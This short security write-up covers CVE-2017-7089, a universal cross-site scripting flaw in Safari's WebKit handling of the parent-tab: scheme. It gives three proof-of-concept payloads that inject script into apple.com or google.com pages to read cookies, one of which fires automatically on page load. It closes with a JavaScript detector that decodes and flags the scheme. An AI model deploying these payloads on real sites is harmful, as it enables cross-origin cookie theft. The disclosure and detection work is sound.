
Safari universal cross site scripting


The issue involves the “WebKit” component. It allows remote attackers to conduct Universal XSS (UXSS) attacks via a crafted web site that is mishandled during parent-tab processing.

Local SOP bypass

<script>function Pew(){var doc=open('parent-tab://apple.com');doc.document.body.innerHTML='<img src=q onerror=alert(document.cookie)>';}</script><button onclick=Pew();>Click me!</button>

Exploit by Frans Rosén

data:text/html,<script>function y(){x=open('parent-tab://google.com','_top'),x.document.body.innerHTML='<img/src=""onerror="alert(document.cookie)">'};setTimeout(y,100)</script>

Both scripts are available on GitHub under CVE-2017-7089.

New XSS attack

<body onload=document.getElementById('pew').click()> <a id='pew' href='data:text/html,<script>function y(){x=open(&#x27;parent-tab://apple.com&#x27;,&#x27;_top&#x27;),x.document.body.innerHTML=&#x27;<img/src=""onerror=alert(document.domain);alert(document.cookie);>&#x27;};setTimeout(y,100)</script>'>hello</a> </body>
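
All three proofs of concept above share one observable: a reference to the parent-tab: scheme, in one variant wrapped in a data: URI with entity-encoded quotes. The JavaScript below is an added example, not code from the original post or from the CVE-2017-7089 repository; it decodes those layers and flags the scheme for content filtering or log review. The function names and the data: URI heuristic are assumptions made for illustration.

```javascript
// Added example: flag markup that references the parent-tab: scheme.
// All names here are hypothetical; nothing below comes from the original post.
const NAMED = { quot: '"', apos: "'", amp: '&', lt: '<', gt: '>' };

// Decode numeric and a few named HTML character references.
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);/gi, (m, ref) => {
    if (ref[0] !== '#') return NAMED[ref.toLowerCase()] ?? m;
    const hex = ref[1] === 'x' || ref[1] === 'X';
    const cp = parseInt(ref.slice(hex ? 2 : 1), hex ? 16 : 10);
    return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
  });
}

// Percent-decode without throwing on malformed sequences.
function decodePercent(s) {
  return s.replace(/(?:%[0-9a-f]{2})+/gi, (m) => {
    try { return decodeURIComponent(m); } catch { return m; }
  });
}

// Peel encoding layers until the text stops changing (bounded), because the
// data: URI variant nests its script inside an entity-encoded href.
function normalize(input, maxRounds = 5) {
  let cur = input;
  for (let i = 0; i < maxRounds; i++) {
    const next = decodePercent(decodeEntities(cur));
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

const SCHEME = /parent-tab\s*:/i;

// Report whether the decoded markup references the scheme, whether it does so
// alongside a data:text/html URI (heuristic), and whether decoding was needed.
function scan(markup) {
  const text = normalize(markup);
  const hit = SCHEME.test(text);
  return {
    referencesParentTab: hit,
    insideDataUri: hit && /data:text\/html/i.test(text),
    decodedLayers: text !== markup,
  };
}
```

A hit that only appears after decoding (decodedLayers true) means the reference was encoded in transit, which a plain substring search over the raw markup would miss.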
